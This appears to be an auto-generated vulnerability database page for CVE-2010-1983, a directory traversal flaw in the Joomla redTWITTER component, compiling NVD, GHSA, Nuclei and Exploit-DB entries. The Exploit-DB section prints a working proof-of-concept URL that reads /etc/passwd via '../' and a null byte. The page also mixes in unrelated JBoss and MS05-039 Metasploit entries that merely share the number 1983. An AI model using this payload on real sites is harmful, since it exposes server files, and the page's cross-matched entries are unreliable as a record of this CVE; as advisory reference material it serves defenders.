CVE-2010-1983
published 2010-05-19
CVE-2010-1983: Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary…
Priority P353 · high · 7.5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 18.82% (96.9th percentile)
Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. NOTE: some of these details are obtained from third party information.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| redcomponent | com_redtwitter | — | — |
| redcomponent | com_redtwitter | — | — |
| redcomponent | com_redtwitter | — | — |
| redcomponent | com_redtwitter | — | — |
| redcomponent | com_redtwitter | — | — |
| redcomponent | com_redtwitter | — | — |
CVSS provenance
nvd · v2.0 · 7.5 HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat · 8.0 HIGH
GHSA
GHSA-2h4h-6mrx-52ff: Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1
ghsa_unreviewed·2022-05-17
CVE-2010-1983 [HIGH] CWE-22 GHSA-2h4h-6mrx-52ff: Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1
Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. NOTE: some of these details are obtained from third party information.
Red Hat
JBoss ON CLI privilege escalation
vendor_redhat·2010-03-18·CVSS 8.0
CVE-2010-0737 [HIGH] JBoss ON CLI privilege escalation
A missing permission check was found in the CLI in JBoss Operations Network before 2.3.1, which allows JBoss ON users to perform management tasks and configuration changes with the privileges of the administrator user.
Statement: This issue was fixed by a patch to JBoss Operations Network 2.3.1, available for download from the Red Hat Customer Portal: https://access.redhat.com/jbossnetwork/restricted/softwareDetail.html?softwareId=1983&product=em&version=2.3.1&downloadType=securityPatches
No detection rules found.
Exploit-DB
Microsoft Plug and Play Service - Overflow (MS05-039) (Metasploit)
exploitdb·2010-08-30
CVE-2005-1983 Microsoft Plug and Play Service - Overflow (MS05-039) (Metasploit)
---
##
# $Id: ms05_039_pnp.rb 10190 2010-08-30 20:40:05Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft Plug and Play Service Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Windows Plug
and Play service. This vulnerability can be exploited on
Windows 2000 without a valid user account.
NOTE: Since the PnP service runs inside the service.exe process, a failed
exploit attempt will cause the system to automatically reboot.
Exploit-DB
Joomla! Component redTWITTER 1.0 - Local File Inclusion
exploitdb·2010-04-04
CVE-2010-1983 Joomla! Component redTWITTER 1.0 - Local File Inclusion
---
[o] Joomla Component redTWITTER Local File Inclusion Vulnerability
Software : com_redtwitter version 1.0.x
Vendor : http://redcomponent.com/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
Home : http://antisecurity.org/
[o] Exploit
http://localhost/[path]/index.php?option=com_redtwitter&view=[LFI]
[o] PoC
http://localhost/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00
[o] Greetz
Vrs-hCk OoN_BoY Paman zxvf Angela Zhang aJe martfella pizzyroot
H312Y yooogy mousekill }^-^{ noname matthews s4va stardustmemory
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
Nuclei
Joomla! Component redTWITTER 1.0 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2010-1983 [HIGH] Joomla! Component redTWITTER 1.0 - Local File Inclusion
A directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
Template:
id: CVE-2010-1983
info:
  name: Joomla! Component redTWITTER 1.0 - Local File Inclusion
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potentia
Greynoiseio
NoiseLetter October 2025
blogs_greynoiseio
Bugzilla
CVE-2010-0737 JBoss ON CLI privilege escalation
bugzilla·2011-09-02·CVSS 8.0
CVE-2010-0737 [HIGH] CVE-2010-0737 JBoss ON CLI privilege escalation
A missing permission check was found in the JBoss Operations Network CLI, a Java shell that allows you to connect to the JBoss ON server over the command line. An unprivileged JBoss ON user could use this flaw to perform JBoss ON management tasks and configuration changes with the privileges of the administrator user.
Discussion:
Statement:
This issue was fixed by a patch to JBoss Operations Network 2.3.1, available for download from the Red Hat Customer Portal: https://access.redhat.com/jbossnetwork/restricted/softwareDetail.html?softwareId=1983&product=em&version=2.3.1&downloadType=securityPatches
http://evilc0de.blogspot.com/2010/04/joomla-component-redtwitter-lfi-vuln.html
http://osvdb.org/63533
http://packetstormsecurity.org/1004-exploits/joomlaredtwitter-lfi.txt
http://secunia.com/advisories/39342
http://www.exploit-db.com/exploits/12055
http://www.securityfocus.com/bid/39211
https://exchange.xforce.ibmcloud.com/vulnerabilities/57511
2010-05-19
Published